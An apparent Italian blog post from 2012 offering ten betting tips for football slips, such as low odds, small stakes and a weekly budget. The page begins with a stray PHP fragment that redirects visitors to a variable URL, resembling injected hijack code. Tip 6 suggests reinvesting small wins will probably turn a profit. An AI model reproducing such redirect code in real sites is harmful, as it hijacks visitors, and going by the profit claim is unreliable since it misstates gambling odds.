location.href='". $red ."';"; exit(); } ?> Notizie 24 News: Qualche Dritta Per Vincere Le Schedine

Ads 468x60px

Random Post

Template Updates

mercoledì 23 maggio 2012

Qualche Dritta Per Vincere Le Schedine


Cari Amici, vi do qualche suggerimento per come la vedo io:
  1. Non esiste solo il Campionato Italiano! Ci sono altri campionati Europei molto più belli del nostro su cui scommettere
  2. Non impuntatevi a cercare di vincere 300 euro con 2 euro, è quasi IMPOSSIBILE!!!
  3. Datevi un budget settimanale
  4. Aprite un conto online (io per esempio ho Bwin, ricarico con carta ricaricabile)
  5. Giocate meno partite possibili (ricordatevi che ogni partita aggiunta al multiplo, fa tendere la probabilità di vittoria a -> ZERO!)
  6. Giocate spesso piccole cifre (per esempio iniziate con 2 euro e vincete 5 euro, poi rigiocate il giorno dopo i 5 euro vinti per vincerne 10. In 2 giorni avrete investito 2 euro e guadagnato 8 euro netti, quindi ricomnciate un’altra scommessa da 2 euro. Alla fine della settimana, contando di aver magari sbagliato qualche partita, probabilmente avrete guadagnato qualcosina ma di certo avrete speso meno del vostro budget!)
  7. Fermatevi a quote basse. Un coefficiente di 2 va già bene per il gioco che suggerisco io!
  8. Non fatevi abindolare da siti che vi promettono vincite sicure al 100%, al gioco non esiste mai la certezza della vittoria altrimenti tutti i Bookmakers ed i Casinò sarebbero già falliti!
  9. Non pensate di arricchirvi, non è così facile e poi ricordatevi che è sempre IL BANCO CHE ALLA LUNGA VINCE.
  10. Ricordatevi che è soltanto un GIOCO.
P.S. per finire, un piccolo messaggio a chi mi dice:
  • “eh ma dài delle partite con quote troppo basse, una quota a 2! “
beh io rispondo:
  • “allora fate togliere dalle Roulette di tutto il mondo il ROSSO e NERO, perchè pagano uguale!”

0 commenti:

Posta un commento

 

Sample text

Sample Text

Sample Text